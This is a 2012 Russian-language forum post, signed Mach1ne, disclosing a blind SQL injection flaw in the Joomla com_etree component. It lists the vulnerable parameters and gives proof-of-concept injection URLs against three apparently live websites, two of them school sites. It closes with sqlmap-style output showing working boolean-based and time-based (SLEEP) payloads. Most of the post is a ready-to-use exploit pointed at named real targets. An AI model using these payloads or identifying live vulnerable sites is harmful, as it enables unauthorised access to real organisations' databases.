20.02.2012, 16:06
|
|
Познающий
Регистрация: 23.06.2008
Сообщений: 34
Провел на форуме:
98050
Репутация:
45
|
|
Joomla com_etree Blind SQL-inj Vuln
# Date: 20.02.2012
# Author: Mach1ne
Уязвимый параметр:
http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=us er&user_id=[SQL]
http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=ca tegory&id=[SQL]
PoC:
http://gradientshift.com/harrisonCounty/index.php?option=com_etree&view=displays&layout=ca tegory&id=6'+and+2=2
http://www.roberts.k12.mt.us/site/index.php?option=com_etree&view=displays&layout=ca tegory&id=7'+and+2=2
http://www.canyoncreekschool.org/?option=com_etree&view=displays&layout=user&user_i d=5'+and+2=2
GET parameter 'user_id' is vulnerable.
---
Place: GET
Parameter: user_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_etree&view=displays&layout=user&user_id =5' AND 425=425 AND 'PbgE'='PbgE
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: option=com_etree&view=displays&layout=user&user_id =5' AND SLEEP(5) AND 'bLot'='bLot
---
|
|
|